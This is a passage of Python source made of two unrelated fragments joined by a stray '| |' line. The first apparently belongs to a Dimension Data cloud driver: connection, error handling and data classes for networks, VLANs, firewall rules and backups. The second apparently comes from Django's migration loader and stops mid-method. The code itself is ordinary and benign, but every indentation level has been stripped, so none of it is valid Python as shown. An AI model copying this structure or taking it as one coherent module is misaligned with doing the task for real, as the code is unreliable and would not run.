('responseCode', TYPES_URN),
('result', GENERAL_NS)
)
BAD_MESSAGE_XML_ELEMENTS = (
('message', SERVER_NS),
('message', TYPES_URN),
('resultDetail', GENERAL_NS)
)
def dd_object_to_id(obj, obj_type, id_value='id'):
"""
Takes in a DD object or string and prints out it's id
This is a helper method, as many of our functions can take either an object
or a string, and we need an easy way of converting them
:param obj: The object to get the id for
:type obj: ``object``
:param func: The function to call, e.g. ex_get_vlan. Note: This
function needs to return an object which has ``status``
attribute.
:type func: ``function``
:rtype: ``str``
"""
if isinstance(obj, obj_type):
return getattr(obj, id_value)
elif isinstance(obj, (basestring)):
return obj
else:
raise TypeError(
"Invalid type %s looking for basestring or %s"
% (type(obj).__name__, obj_type.__name__)
)
class NetworkDomainServicePlan(object):
ESSENTIALS = "ESSENTIALS"
ADVANCED = "ADVANCED"
class DimensionDataResponse(XmlResponse):
def parse_error(self):
if self.status == httplib.UNAUTHORIZED:
raise InvalidCredsError(self.body)
elif self.status == httplib.FORBIDDEN:
raise InvalidCredsError(self.body)
body = self.parse_body()
if self.status == httplib.BAD_REQUEST:
for response_code in BAD_CODE_XML_ELEMENTS:
code = findtext(body, response_code[0], response_code[1])
if code is not None:
break
for message in BAD_MESSAGE_XML_ELEMENTS:
message = findtext(body, message[0], message[1])
if message is not None:
break
raise DimensionDataAPIException(code=code,
msg=message,
driver=self.connection.driver)
if self.status is not httplib.OK:
raise DimensionDataAPIException(code=self.status,
msg=body,
driver=self.connection.driver)
return self.body
class DimensionDataAPIException(LibcloudError):
def __init__(self, code, msg, driver):
self.code = code
self.msg = msg
self.driver = driver
def __str__(self):
return "%s: %s" % (self.code, self.msg)
def __repr__(self):
return ("<DimensionDataAPIException: code='%s', msg='%s'>" %
(self.code, self.msg))
class DimensionDataConnection(ConnectionUserAndKey):
"""
Connection class for the DimensionData driver
"""
api_path_version_1 = '/oec'
api_path_version_2 = '/caas'
api_version_1 = '0.9'
api_version_2 = '2.2'
_orgId = None
responseCls = DimensionDataResponse
allow_insecure = False
def __init__(self, user_id, key, secure=True, host=None, port=None,
url=None, timeout=None, proxy_url=None, **conn_kwargs):
super(DimensionDataConnection, self).__init__(
user_id=user_id,
key=key,
secure=secure,
host=host, port=port,
url=url, timeout=timeout,
proxy_url=proxy_url)
if conn_kwargs['region']:
self.host = conn_kwargs['region']['host']
def add_default_headers(self, headers):
headers['Authorization'] = \
('Basic %s' % b64encode(b('%s:%s' % (self.user_id,
self.key))).decode('utf-8'))
headers['Content-Type'] = 'application/xml'
return headers
def request_api_1(self, action, params=None, data='',
headers=None, method='GET'):
action = "%s/%s/%s" % (self.api_path_version_1,
self.api_version_1, action)
return super(DimensionDataConnection, self).request(
action=action,
params=params, data=data,
method=method, headers=headers)
def request_api_2(self, path, action, params=None, data='',
headers=None, method='GET'):
action = "%s/%s/%s/%s" % (self.api_path_version_2,
self.api_version_2, path, action)
return super(DimensionDataConnection, self).request(
action=action,
params=params, data=data,
method=method, headers=headers)
def request_with_orgId_api_1(self, action, params=None, data='',
headers=None, method='GET'):
action = "%s/%s" % (self.get_resource_path_api_1(), action)
return super(DimensionDataConnection, self).request(
action=action,
params=params, data=data,
method=method, headers=headers)
def request_with_orgId_api_2(self, action, params=None, data='',
headers=None, method='GET'):
action = "%s/%s" % (self.get_resource_path_api_2(), action)
return super(DimensionDataConnection, self).request(
action=action,
params=params, data=data,
method=method, headers=headers)
def paginated_request_with_orgId_api_2(self, action, params=None, data='',
headers=None, method='GET',
page_size=250):
"""
A paginated request to the MCP2.0 API
This essentially calls out to request_with_orgId_api_2 for each page
and yields the response to make a generator
This generator can be looped through to grab all the pages.
:param action: The resource to access (i.e. 'network/vlan')
:type action: ``str``
:param params: Parameters to give to the action
:type params: ``dict`` or ``None``
:param data: The data payload to be added to the request
:type data: ``str``
:param headers: Additional header to be added to the request
:type headers: ``str`` or ``dict`` or ``None``
:param method: HTTP Method for the request (i.e. 'GET', 'POST')
:type method: ``str``
:param page_size: The size of each page to be returned
Note: Max page size in MCP2.0 is currently 250
:type page_size: ``int``
"""
if params is None:
params = {}
params['pageSize'] = page_size
paged_resp = self.request_with_orgId_api_2(action, params,
data, headers,
method).object
yield paged_resp
paged_resp = paged_resp or {}
while int(paged_resp.get('pageCount')) >= \
int(paged_resp.get('pageSize')):
params['pageNumber'] = int(paged_resp.get('pageNumber')) + 1
paged_resp = self.request_with_orgId_api_2(action, params,
data, headers,
method).object
yield paged_resp
def get_resource_path_api_1(self):
"""
This method returns a resource path which is necessary for referencing
resources that require a full path instead of just an ID, such as
networks, and customer snapshots.
"""
return ("%s/%s/%s" % (self.api_path_version_1, self.api_version_1,
self._get_orgId()))
def get_resource_path_api_2(self):
"""
This method returns a resource path which is necessary for referencing
resources that require a full path instead of just an ID, such as
networks, and customer snapshots.
"""
return ("%s/%s/%s" % (self.api_path_version_2, self.api_version_2,
self._get_orgId()))
def wait_for_state(self, state, func, poll_interval=2, timeout=60, *args,
**kwargs):
"""
Wait for the function which returns a instance with field status/state
to match.
Keep polling func until one of the desired states is matched
:param state: Either the desired state (`str`) or a `list` of states
:type state: ``str`` or ``list``
:param func: The function to call, e.g. ex_get_vlan. Note: This
function needs to return an object which has ``status``
attribute.
:type func: ``function``
:param poll_interval: The number of seconds to wait between checks
:type poll_interval: `int`
:param timeout: The total number of seconds to wait to reach a state
:type timeout: `int`
:param args: The arguments for func
:type args: Positional arguments
:param kwargs: The arguments for func
:type kwargs: Keyword arguments
:return: Result from the calling function.
"""
cnt = 0
while cnt < timeout / poll_interval:
result = func(*args, **kwargs)
if isinstance(result, Node):
object_state = result.state
else:
object_state = result.status
if object_state is state or object_state in state:
return result
sleep(poll_interval)
cnt += 1
msg = 'Status check for object %s timed out' % (result)
raise DimensionDataAPIException(code=object_state,
msg=msg,
driver=self.driver)
def _get_orgId(self):
"""
Send the /myaccount API request to DimensionData cloud and parse the
'orgId' from the XML response object. We need the orgId to use most
of the other API functions
"""
if self._orgId is None:
body = self.request_api_1('myaccount').object
self._orgId = findtext(body, 'orgId', DIRECTORY_NS)
return self._orgId
def get_account_details(self):
"""
Get the details of this account
:rtype: :class:`DimensionDataAccountDetails`
"""
body = self.request_api_1('myaccount').object
return DimensionDataAccountDetails(
user_name=findtext(body, 'userName', DIRECTORY_NS),
full_name=findtext(body, 'fullName', DIRECTORY_NS),
first_name=findtext(body, 'firstName', DIRECTORY_NS),
last_name=findtext(body, 'lastName', DIRECTORY_NS),
email=findtext(body, 'emailAddress', DIRECTORY_NS))
class DimensionDataAccountDetails(object):
"""
Dimension Data account class details
"""
def __init__(self, user_name, full_name, first_name, last_name, email):
self.user_name = user_name
self.full_name = full_name
self.first_name = first_name
self.last_name = last_name
self.email = email
class DimensionDataStatus(object):
"""
DimensionData API pending operation status class
action, request_time, user_name, number_of_steps, update_time,
step.name, step.number, step.percent_complete, failure_reason,
"""
def __init__(self, action=None, request_time=None, user_name=None,
number_of_steps=None, update_time=None, step_name=None,
step_number=None, step_percent_complete=None,
failure_reason=None):
self.action = action
self.request_time = request_time
self.user_name = user_name
self.number_of_steps = number_of_steps
self.update_time = update_time
self.step_name = step_name
self.step_number = step_number
self.step_percent_complete = step_percent_complete
self.failure_reason = failure_reason
def __repr__(self):
return (('<DimensionDataStatus: action=%s, request_time=%s, '
'user_name=%s, number_of_steps=%s, update_time=%s, '
'step_name=%s, step_number=%s, '
'step_percent_complete=%s, failure_reason=%s>')
% (self.action, self.request_time, self.user_name,
self.number_of_steps, self.update_time, self.step_name,
self.step_number, self.step_percent_complete,
self.failure_reason))
class DimensionDataNetwork(object):
"""
DimensionData network with location.
"""
def __init__(self, id, name, description, location, private_net,
multicast, status):
self.id = str(id)
self.name = name
self.description = description
self.location = location
self.private_net = private_net
self.multicast = multicast
self.status = status
def __repr__(self):
return (('<DimensionDataNetwork: id=%s, name=%s, description=%s, '
'location=%s, private_net=%s, multicast=%s>')
% (self.id, self.name, self.description, self.location,
self.private_net, self.multicast))
class DimensionDataNetworkDomain(object):
"""
DimensionData network domain with location.
"""
def __init__(self, id, name, description, location, status, plan):
self.id = str(id)
self.name = name
self.description = description
self.location = location
self.status = status
self.plan = plan
def __repr__(self):
return (('<DimensionDataNetworkDomain: id=%s, name=%s, '
'description=%s, location=%s, status=%s>')
% (self.id, self.name, self.description, self.location,
self.status))
class DimensionDataPublicIpBlock(object):
"""
DimensionData Public IP Block with location.
"""
def __init__(self, id, base_ip, size, location, network_domain,
status):
self.id = str(id)
self.base_ip = base_ip
self.size = size
self.location = location
self.network_domain = network_domain
self.status = status
def __repr__(self):
return (('<DimensionDataNetworkDomain: id=%s, base_ip=%s, '
'size=%s, location=%s, status=%s>')
% (self.id, self.base_ip, self.size, self.location,
self.status))
class DimensionDataServerCpuSpecification(object):
"""
A class that represents the specification of the CPU(s) for a
node
"""
def __init__(self, cpu_count, cores_per_socket, performance):
"""
Instantiate a new :class:`DimensionDataServerCpuSpecification`
:param cpu_count: The number of CPUs
:type cpu_count: ``int``
:param cores_per_socket: The number of cores per socket, the
recommendation is 1
:type cores_per_socket: ``int``
:param performance: The performance type, e.g. HIGHPERFORMANCE
:type performance: ``str``
"""
self.cpu_count = cpu_count
self.cores_per_socket = cores_per_socket
self.performance = performance
def __repr__(self):
return (('<DimensionDataServerCpuSpecification: '
'cpu_count=%s, cores_per_socket=%s, '
'performance=%s>')
% (self.cpu_count, self.cores_per_socket, self.performance))
class DimensionDataServerDisk(object):
"""
A class that represents the disk on a server
"""
def __init__(self, id, scsi_id, size_gb, speed, state):
"""
Instantiate a new :class:`DimensionDataServerDisk`
:param id: The id of the disk
:type id: ``str``
:param scsi_id: Representation for scsi
:type scsi_id: ``int``
:param size_gb: Size of the disk
:type size_gb: ``int``
:param speed: Speed of the disk (i.e. STANDARD)
:type speed: ``str``
:param state: State of the disk (i.e. PENDING)
:type state: ``str``
"""
self.id = id
self.scsi_id = scsi_id
self.size_gb = size_gb
self.speed = speed
self.state = state
def __repr__(self):
return (('<DimensionDataServerDisk: '
'id=%s, size_gb=%s')
% (self.id, self.size_gb))
class DimensionDataServerVMWareTools(object):
"""
A class that represents the VMWareTools for a node
"""
def __init__(self, status, version_status, api_version):
"""
Instantiate a new :class:`DimensionDataServerVMWareTools` object
:param status: The status of VMWare Tools
:type status: ``str``
:param version_status: The status for the version of VMWare Tools
(i.e NEEDS_UPGRADE)
:type version_status: ``str``
:param api_version: The API version of VMWare Tools
:type api_version: ``str``
"""
self.status = status
self.version_status = version_status
self.api_version = api_version
def __repr__(self):
return (('<DimensionDataServerVMWareTools '
'status=%s, version_status=%s, '
'api_version=%s>')
% (self.status, self.version_status, self.api_version))
class DimensionDataFirewallRule(object):
"""
DimensionData Firewall Rule for a network domain
"""
def __init__(self, id, name, action, location, network_domain,
status, ip_version, protocol, source, destination,
enabled):
self.id = str(id)
self.name = name
self.action = action
self.location = location
self.network_domain = network_domain
self.status = status
self.ip_version = ip_version
self.protocol = protocol
self.source = source
self.destination = destination
self.enabled = enabled
def __repr__(self):
return (('<DimensionDataFirewallRule: id=%s, name=%s, '
'action=%s, location=%s, network_domain=%s, '
'status=%s, ip_version=%s, protocol=%s, source=%s, '
'destination=%s, enabled=%s>')
% (self.id, self.name, self.action, self.location,
self.network_domain, self.status, self.ip_version,
self.protocol, self.source, self.destination,
self.enabled))
class DimensionDataFirewallAddress(object):
"""
The source or destination model in a firewall rule
"""
def __init__(self, any_ip, ip_address, ip_prefix_size,
port_begin, port_end, address_list_id,
port_list_id):
self.any_ip = any_ip
self.ip_address = ip_address
self.ip_prefix_size = ip_prefix_size
self.port_begin = port_begin
self.port_end = port_end
self.address_list_id = address_list_id
self.port_list_id = port_list_id
class DimensionDataNatRule(object):
"""
An IP NAT rule in a network domain
"""
def __init__(self, id, network_domain, internal_ip, external_ip, status):
self.id = id
self.network_domain = network_domain
self.internal_ip = internal_ip
self.external_ip = external_ip
self.status = status
def __repr__(self):
return (('<DimensionDataNatRule: id=%s, status=%s>')
% (self.id, self.status))
class DimensionDataAntiAffinityRule(object):
"""
Anti-Affinity rule for DimensionData
An Anti-Affinity rule ensures that servers in the rule will
not reside on the same VMware ESX host.
"""
def __init__(self, id, node_list):
"""
Instantiate a new :class:`DimensionDataAntiAffinityRule`
:param id: The ID of the Anti-Affinity rule
:type id: ``str``
:param node_list: List of node ids that belong in this rule
:type node_list: ``list`` of ``str``
"""
self.id = id
self.node_list = node_list
def __repr__(self):
return (('<DimensionDataAntiAffinityRule: id=%s>')
% (self.id))
class DimensionDataVlan(object):
"""
DimensionData VLAN.
"""
def __init__(self, id, name, description, location, network_domain,
status, private_ipv4_range_address, private_ipv4_range_size,
ipv6_range_address, ipv6_range_size, ipv4_gateway,
ipv6_gateway):
"""
Initialize an instance of ``DimensionDataVlan``
:param id: The ID of the VLAN
:type id: ``str``
:param name: The name of the VLAN
:type name: ``str``
:param description: Plan text description of the VLAN
:type description: ``str``
:param location: The location (data center) of the VLAN
:type location: ``NodeLocation``
:param network_domain: The Network Domain that owns this VLAN
:type network_domain: :class:`DimensionDataNetworkDomain`
:param status: The status of the VLAN
:type status: :class:`DimensionDataStatus`
:param private_ipv4_range_address: The host address of the VLAN
IP space
:type private_ipv4_range_address: ``str``
:param private_ipv4_range_size: The size (e.g. '24') of the VLAN
as a CIDR range size
:type private_ipv4_range_size: ``int``
:param ipv6_range_address: The host address of the VLAN
IP space
:type ipv6_range_address: ``str``
:param ipv6_range_size: The size (e.g. '32') of the VLAN
as a CIDR range size
:type ipv6_range_size: ``int``
:param ipv4_gateway: The IPv4 default gateway address
:type ipv4_gateway: ``str``
:param ipv6_gateway: The IPv6 default gateway address
:type ipv6_gateway: ``str``
"""
self.id = str(id)
self.name = name
self.location = location
self.description = description
self.network_domain = network_domain
self.status = status
self.private_ipv4_range_address = private_ipv4_range_address
self.private_ipv4_range_size = private_ipv4_range_size
self.ipv6_range_address = ipv6_range_address
self.ipv6_range_size = ipv6_range_size
self.ipv4_gateway = ipv4_gateway
self.ipv6_gateway = ipv6_gateway
def __repr__(self):
return (('<DimensionDataVlan: id=%s, name=%s, '
'description=%s, location=%s, status=%s>')
% (self.id, self.name, self.description,
self.location, self.status))
class DimensionDataPool(object):
"""
DimensionData VIP Pool.
"""
def __init__(self, id, name, description, status, load_balance_method,
health_monitor_id, service_down_action, slow_ramp_time):
"""
Initialize an instance of ``DimensionDataPool``
:param id: The ID of the pool
:type id: ``str``
:param name: The name of the pool
:type name: ``str``
:param description: Plan text description of the pool
:type description: ``str``
:param status: The status of the pool
:type status: :class:`DimensionDataStatus`
:param load_balance_method: The load balancer method
:type load_balance_method: ``str``
:param health_monitor_id: The ID of the health monitor
:type health_monitor_id: ``str``
:param service_down_action: Action to take when pool is down
:type service_down_action: ``str``
:param slow_ramp_time: The ramp-up time for service recovery
:type slow_ramp_time: ``int``
"""
self.id = str(id)
self.name = name
self.description = description
self.status = status
self.load_balance_method = load_balance_method
self.health_monitor_id = health_monitor_id
self.service_down_action = service_down_action
self.slow_ramp_time = slow_ramp_time
def __repr__(self):
return (('<DimensionDataPool: id=%s, name=%s, '
'description=%s, status=%s>')
% (self.id, self.name, self.description,
self.status))
class DimensionDataPoolMember(object):
"""
DimensionData VIP Pool Member.
"""
def __init__(self, id, name, status, ip, port, node_id):
"""
Initialize an instance of ``DimensionDataPoolMember``
:param id: The ID of the pool member
:type id: ``str``
:param name: The name of the pool member
:type name: ``str``
:param status: The status of the pool
:type status: :class:`DimensionDataStatus`
:param ip: The IP of the pool member
:type ip: ``str``
:param port: The port of the pool member
:type port: ``int``
:param node_id: The ID of the associated node
:type node_id: ``str``
"""
self.id = str(id)
self.name = name
self.status = status
self.ip = ip
self.port = port
self.node_id = node_id
def __repr__(self):
return (('<DimensionDataPoolMember: id=%s, name=%s, '
'ip=%s, status=%s, port=%s, node_id=%s>')
% (self.id, self.name,
self.ip, self.status, self.port,
self.node_id))
class DimensionDataVIPNode(object):
def __init__(self, id, name, status, ip, connection_limit='10000',
connection_rate_limit='10000'):
"""
Initialize an instance of :class:`DimensionDataVIPNode`
:param id: The ID of the node
:type id: ``str``
:param name: The name of the node
:type name: ``str``
:param status: The status of the node
:type status: :class:`DimensionDataStatus`
:param ip: The IP of the node
:type ip: ``str``
:param connection_limit: The total connection limit for the node
:type connection_limit: ``int``
:param connection_rate_limit: The rate limit for the node
:type connection_rate_limit: ``int``
"""
self.id = str(id)
self.name = name
self.status = status
self.ip = ip
self.connection_limit = connection_limit
self.connection_rate_limit = connection_rate_limit
def __repr__(self):
return (('<DimensionDataVIPNode: id=%s, name=%s, '
'status=%s, ip=%s>')
% (self.id, self.name,
self.status, self.ip))
class DimensionDataVirtualListener(object):
"""
DimensionData Virtual Listener.
"""
def __init__(self, id, name, status, ip):
"""
Initialize an instance of :class:`DimensionDataVirtualListener`
:param id: The ID of the listener
:type id: ``str``
:param name: The name of the listener
:type name: ``str``
:param status: The status of the listener
:type status: :class:`DimensionDataStatus`
:param ip: The IP of the listener
:type ip: ``str``
"""
self.id = str(id)
self.name = name
self.status = status
self.ip = ip
def __repr__(self):
return (('<DimensionDataVirtualListener: id=%s, name=%s, '
'status=%s, ip=%s>')
% (self.id, self.name,
self.status, self.ip))
class DimensionDataDefaultHealthMonitor(object):
"""
A default health monitor for a VIP (node, pool or listener)
"""
def __init__(self, id, name, node_compatible, pool_compatible):
"""
Initialize an instance of :class:`DimensionDataDefaultHealthMonitor`
:param id: The ID of the monitor
:type id: ``str``
:param name: The name of the monitor
:type name: ``str``
:param node_compatible: Is a monitor capable of monitoring nodes
:type node_compatible: ``bool``
:param pool_compatible: Is a monitor capable of monitoring pools
:type pool_compatible: ``bool``
"""
self.id = id
self.name = name
self.node_compatible = node_compatible
self.pool_compatible = pool_compatible
def __repr__(self):
return (('<DimensionDataDefaultHealthMonitor: id=%s, name=%s>')
% (self.id, self.name))
class DimensionDataPersistenceProfile(object):
"""
Each Persistence Profile declares the combination of Virtual Listener
type and protocol with which it is
compatible and whether or not it is compatible as a
Fallback Persistence Profile.
"""
def __init__(self, id, name, compatible_listeners, fallback_compatible):
"""
Initialize an instance of :class:`DimensionDataPersistenceProfile`
:param id: The ID of the profile
:type id: ``str``
:param name: The name of the profile
:type name: ``str``
:param compatible_listeners: List of compatible Virtual Listener types
:type compatible_listeners: ``list`` of
:class:`DimensionDataVirtualListenerCompatibility`
:param fallback_compatible: Is capable as a fallback profile
:type fallback_compatible: ``bool``
"""
self.id = id
self.name = name
self.compatible_listeners = compatible_listeners
self.fallback_compatible = fallback_compatible
def __repr__(self):
return (('<DimensionDataPersistenceProfile: id=%s, name=%s>')
% (self.id, self.name))
class DimensionDataDefaultiRule(object):
"""
A default iRule for a network domain, can be applied to a listener
"""
def __init__(self, id, name, compatible_listeners):
"""
Initialize an instance of :class:`DimensionDataDefaultiRule`
:param id: The ID of the iRule
:type id: ``str``
:param name: The name of the iRule
:type name: ``str``
:param compatible_listeners: List of compatible Virtual Listener types
:type compatible_listeners: ``list`` of
:class:`DimensionDataVirtualListenerCompatibility`
"""
self.id = id
self.name = name
self.compatible_listeners = compatible_listeners
def __repr__(self):
return (('<DimensionDataDefaultiRule: id=%s, name=%s>')
% (self.id, self.name))
class DimensionDataVirtualListenerCompatibility(object):
"""
A compatibility preference for a persistence profile or iRule
specifies which virtual listener types this profile or iRule can be
applied to.
"""
def __init__(self, type, protocol):
self.type = type
self.protocol = protocol
def __repr__(self):
return (('<DimensionDataVirtualListenerCompatibility: '
'type=%s, protocol=%s>')
% (self.type, self.protocol))
class DimensionDataBackupDetails(object):
"""
Dimension Data Backup Details represents information about
a targets backups configuration
"""
def __init__(self, asset_id, service_plan, status, clients=None):
"""
Initialize an instance of :class:`DimensionDataBackupDetails`
:param asset_id: Asset identification for backups
:type asset_id: ``str``
:param service_plan: The service plan for backups. i.e (Essentials)
:type service_plan: ``str``
:param status: The overall status this backup target.
i.e. (unregistered)
:type status: ``str``
:param clients: Backup clients attached to this target
:type clients: ``list`` of :class:`DimensionDataBackupClient`
"""
self.asset_id = asset_id
self.service_plan = service_plan
self.status = status
self.clients = clients
def __repr__(self):
return (('<DimensionDataBackupDetails: id=%s>')
% (self.asset_id))
class DimensionDataBackupClient(object):
"""
An object that represents a backup client
"""
def __init__(self, id, type, status,
schedule_policy, storage_policy, download_url,
alert=None, running_job=None):
"""
Initialize an instance of :class:`DimensionDataBackupClient`
:param id: Unique ID for the client
:type id: ``str``
:param type: The type of client that this client is
:type type: :class:`DimensionDataBackupClientType`
:param status: The states of this particular backup client.
i.e. (Unregistered)
:type status: ``str``
:param schedule_policy: The schedule policy for this client
NOTE: Dimension Data only sends back the name
of the schedule policy, no further details
:type schedule_policy: ``str``
:param storage_policy: The storage policy for this client
NOTE: Dimension Data only sends back the name
of the storage policy, no further details
:type storage_policy: ``str``
:param download_url: The download url for this client
:type download_url: ``str``
:param alert: The alert configured for this backup client (optional)
:type alert: :class:`DimensionDataBackupClientAlert`
:param alert: The running job for the client (optional)
:type alert: :class:`DimensionDataBackupClientRunningJob`
"""
self.id = id
self.type = type
self.status = status
self.schedule_policy = schedule_policy
self.storage_policy = storage_policy
self.download_url = download_url
self.alert = alert
self.running_job = running_job
def __repr__(self):
return (('<DimensionDataBackupClient: id=%s>')
% (self.id))
class DimensionDataBackupClientAlert(object):
"""
An alert for a backup client
"""
def __init__(self, trigger, notify_list=[]):
"""
Initialize an instance of :class:`DimensionDataBackupClientAlert`
:param trigger: Trigger type for the client i.e. ON_FAILURE
:type trigger: ``str``
:param notify_list: List of email addresses that are notified
when the alert is fired
:type notify_list: ``list`` of ``str``
"""
self.trigger = trigger
self.notify_list = notify_list
def __repr__(self):
return (('<DimensionDataBackupClientAlert: trigger=%s>')
% (self.trigger))
class DimensionDataBackupClientRunningJob(object):
"""
A running job for a given backup client
"""
def __init__(self, id, status, percentage=0):
"""
Initialize an instance of :class:`DimensionDataBackupClientRunningJob`
:param id: The unqiue ID of the job
:type id: ``str``
:param status: The status of the job i.e. Waiting
:type status: ``str``
:param percentage: The percentage completion of the job
:type percentage: ``int``
"""
self.id = id
self.percentage = percentage
self.status = status
def __repr__(self):
return (('<DimensionDataBackupClientRunningJob: id=%s>')
% (self.id))
class DimensionDataBackupClientType(object):
"""
A client type object for backups
"""
def __init__(self, type, is_file_system, description):
"""
Initialize an instance of :class:`DimensionDataBackupClientType`
:param type: The type of client i.e. (FA.Linux, MySQL, ect.)
:type type: ``str``
:param is_file_system: The name of the iRule
:type is_file_system: ``bool``
:param description: Description of the client
:type description: ``str``
"""
self.type = type
self.is_file_system = is_file_system
self.description = description
def __repr__(self):
return (('<DimensionDataBackupClientType: type=%s>')
% (self.type))
class DimensionDataBackupStoragePolicy(object):
"""
A representation of a storage policy
"""
def __init__(self, name, retention_period, secondary_location):
"""
Initialize an instance of :class:`DimensionDataBackupStoragePolicy`
:param name: The name of the storage policy i.e. 14 Day Storage Policy
:type name: ``str``
:param retention_period: How long to keep the backup in days
:type retention_period: ``int``
:param secondary_location: The secondary location i.e. Primary
:type secondary_location: ``str``
"""
self.name = name
self.retention_period = retention_period
self.secondary_location = secondary_location
def __repr__(self):
return (('<DimensionDataBackupStoragePolicy: name=%s>')
% (self.name))
class DimensionDataBackupSchedulePolicy(object):
"""
A representation of a schedule policy
"""
def __init__(self, name, description):
"""
Initialize an instance of :class:`DimensionDataBackupSchedulePolicy`
:param name: The name of the policy i.e 12AM - 6AM
:type name: ``str``
:param description: Short summary of the details of the policy
:type description: ``str``
"""
self.name = name
self.description = description
def __repr__(self):
return (('<DimensionDataBackupSchedulePolicy: name=%s>')
% (self.name))
class DimensionDataTag(object):
"""
A representation of a Tag in Dimension Data
A Tag first must have a Tag Key, then an asset is tag with
a key and an option value. Tags can be queried later to filter assets
and also show up on usage report if so desired.
"""
def __init__(self, asset_type, asset_id, asset_name,
datacenter, key, value):
"""
Initialize an instance of :class:`DimensionDataTag`
:param asset_type: The type of asset. Current asset types:
SERVER, VLAN, NETWORK_DOMAIN, CUSTOMER_IMAGE,
PUBLIC_IP_BLOCK, ACCOUNT
:type asset_type: ``str``
:param asset_id: The GUID of the asset that is tagged
:type asset_id: ``str``
:param asset_name: The name of the asset that is tagged
:type asset_name: ``str``
:param datacenter: The short datacenter name of the tagged asset
:type datacenter: ``str``
:param key: The tagged key
:type key: :class:`DimensionDataTagKey`
:param value: The tagged value
:type value: ``None`` or ``str``
"""
self.asset_type = asset_type
self.asset_id = asset_id
self.asset_name = asset_name
self.datacenter = datacenter
self.key = key
self.value = value
def __repr__(self):
return (('<DimensionDataTag: asset_name=%s, tag_name=%s, value=%s>')
% (self.asset_name, self.key.name, self.value))
class DimensionDataTagKey(object):
"""
A representation of a Tag Key in Dimension Data
A tag key is required to tag an asset
"""
def __init__(self, id, name, description,
value_required, display_on_report):
"""
Initialize an instance of :class:`DimensionDataTagKey`
:param id: GUID of the tag key
:type id: ``str``
:param name: Name of the tag key
:type name: ``str``
:param description: Description of the tag key
:type description: ``str``
:param value_required: If a value is required for this tag key
:type value_required: ``bool``
:param display_on_report: If this tag key should be displayed on
usage reports
:type display_on_report: ``bool``
"""
self.id = id
self.name = name
self.description = description
self.value_required = value_required
self.display_on_report = display_on_report
def __repr__(self):
return (('<DimensionDataTagKey: name=%s>')
% (self.name))
| |
import pkgutil
import sys
from importlib import import_module, reload
from django.apps import apps
from django.conf import settings
from django.db.migrations.graph import MigrationGraph
from django.db.migrations.recorder import MigrationRecorder
from .exceptions import (
AmbiguityError, BadMigrationError, InconsistentMigrationHistory,
NodeNotFoundError,
)
MIGRATIONS_MODULE_NAME = 'migrations'
class MigrationLoader:
"""
Load migration files from disk and their status from the database.
Migration files are expected to live in the "migrations" directory of
an app. Their names are entirely unimportant from a code perspective,
but will probably follow the 1234_name.py convention.
On initialization, this class will scan those directories, and open and
read the Python files, looking for a class called Migration, which should
inherit from django.db.migrations.Migration. See
django.db.migrations.migration for what that looks like.
Some migrations will be marked as "replacing" another set of migrations.
These are loaded into a separate set of migrations away from the main ones.
If all the migrations they replace are either unapplied or missing from
disk, then they are injected into the main set, replacing the named migrations.
Any dependency pointers to the replaced migrations are re-pointed to the
new migration.
This does mean that this class MUST also talk to the database as well as
to disk, but this is probably fine. We're already not just operating
in memory.
"""
def __init__(self, connection, load=True, ignore_no_migrations=False):
self.connection = connection
self.disk_migrations = None
self.applied_migrations = None
self.ignore_no_migrations = ignore_no_migrations
if load:
self.build_graph()
@classmethod
def migrations_module(cls, app_label):
"""
Return the path to the migrations module for the specified app_label
and a boolean indicating if the module is specified in
settings.MIGRATION_MODULE.
"""
if app_label in settings.MIGRATION_MODULES:
return settings.MIGRATION_MODULES[app_label], True
else:
app_package_name = apps.get_app_config(app_label).name
return '%s.%s' % (app_package_name, MIGRATIONS_MODULE_NAME), False
def load_disk(self):
"""Load the migrations from all INSTALLED_APPS from disk."""
self.disk_migrations = {}
self.unmigrated_apps = set()
self.migrated_apps = set()
for app_config in apps.get_app_configs():
# Get the migrations module directory
module_name, explicit = self.migrations_module(app_config.label)
if module_name is None:
self.unmigrated_apps.add(app_config.label)
continue
was_loaded = module_name in sys.modules
try:
module = import_module(module_name)
except ImportError as e:
# I hate doing this, but I don't want to squash other import errors.
# Might be better to try a directory check directly.
if ((explicit and self.ignore_no_migrations) or (
not explicit and "No module named" in str(e) and MIGRATIONS_MODULE_NAME in str(e))):
self.unmigrated_apps.add(app_config.label)
continue
raise
else:
# Empty directories are namespaces.
# getattr() needed on PY36 and older (replace w/attribute access).
if getattr(module, '__file__', None) is None:
self.unmigrated_apps.add(app_config.label)
continue
# Module is not a package (e.g. migrations.py).
if not hasattr(module, '__path__'):
self.unmigrated_apps.add(app_config.label)
continue
# Force a reload if it's already loaded (tests need this)
if was_loaded:
reload(module)
self.migrated_apps.add(app_config.label)
migration_names = {
name for _, name, is_pkg in pkgutil.iter_modules(module.__path__)
if not is_pkg and name[0] not in '_~'
}
# Load migrations
for migration_name in migration_names:
migration_path = '%s.%s' % (module_name, migration_name)
try:
migration_module = import_module(migration_path)
except ImportError as e:
if 'bad magic number' in str(e):
raise ImportError(
"Couldn't import %r as it appears to be a stale "
".pyc file." % migration_path
) from e
else:
raise
if not hasattr(migration_module, "Migration"):
raise BadMigrationError(
"Migration %s in app %s has no Migration class" % (migration_name, app_config.label)
)
self.disk_migrations[app_config.label, migration_name] = migration_module.Migration(
migration_name,
app_config.label,
)
def get_migration(self, app_label, name_prefix):
"""Return the named migration or raise NodeNotFoundError."""
return self.graph.nodes[app_label, name_prefix]
def get_migration_by_prefix(self, app_label, name_prefix):
"""
Return the migration(s) which match the given app label and name_prefix.
"""
# Do the search
results = []
for migration_app_label, migration_name in self.disk_migrations:
if migration_app_label == app_label and migration_name.startswith(name_prefix):
results.append((migration_app_label, migration_name))
if len(results) > 1:
raise AmbiguityError(
"There is more than one migration for '%s' with the prefix '%s'" % (app_label, name_prefix)
)
elif not results:
raise KeyError("There no migrations for '%s' with the prefix '%s'" % (app_label, name_prefix))
else:
return self.disk_migrations[results[0]]
def check_key(self, key, current_app):
if (key[1] != "__first__" and key[1] != "__latest__") or key in self.graph:
return key
# Special-case __first__, which means "the first migration" for
# migrated apps, and is ignored for unmigrated apps. It allows
# makemigrations to declare dependencies on apps before they even have
# migrations.
if key[0] == current_app:
# Ignore __first__ references to the same app (#22325)
return
if key[0] in self.unmigrated_apps:
# This app isn't migrated, but something depends on it.
# The models will get auto-added into the state, though
# so we're fine.
return
if key[0] in self.migrated_apps:
try:
if key[1] == "__first__":
return self.graph.root_nodes(key[0])[0]
else: # "__latest__"
return self.graph.leaf_nodes(key[0])[0]
except IndexError:
if self.ignore_no_migrations:
return None
else:
